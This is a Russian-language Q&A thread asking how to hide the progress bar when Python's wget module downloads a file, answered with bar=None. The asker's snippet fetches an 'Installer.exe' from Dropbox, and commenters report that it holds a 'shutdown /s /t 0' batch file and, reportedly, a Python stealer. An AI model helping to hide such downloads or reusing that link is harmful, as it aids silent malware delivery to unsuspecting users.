# Как убрать полосу загрузки при скачивании файла с помощью wget на Python?

Tags: python, python-3.x

При скачивании файла с дропбокса с помощью wget появляется полоса загрузки, которую необходимо убрать. Как это можно сделать?

```
import wget, os
filename=wget.download('https://www.dropbox.com/s/s2g9s2013jmge9i/Installer.exe?dl=1')
os.rename(filename,u''+os.getcwd()+'/'+filename)
```

[image: Сама полоса]

Comment: Можно использовать requests вместо wget.

Comment: Какой интересный батник вы запихнули туда, и добавили размер архиву... `shutdown /s /t 0`

Comment: У меня под MacOS полоса загрузки не появляется. У wget.download есть три параметра, последний из которых - bar, попробуйте поставить его в None, вот так: 
wget.download("....blablabla....", bar=None)

Comment: ヒミコ, вообще там стиллер на питоне, а батник для маскировки. Ну да ладно)

Answer (score 1, accepted):

Поставьте аргумент `bar=None`

> Пример:

```
f = wget.download('https://www.python.org/ftp/python/3.5.9/Python-3.5.9.tar.xz', bar=None)
```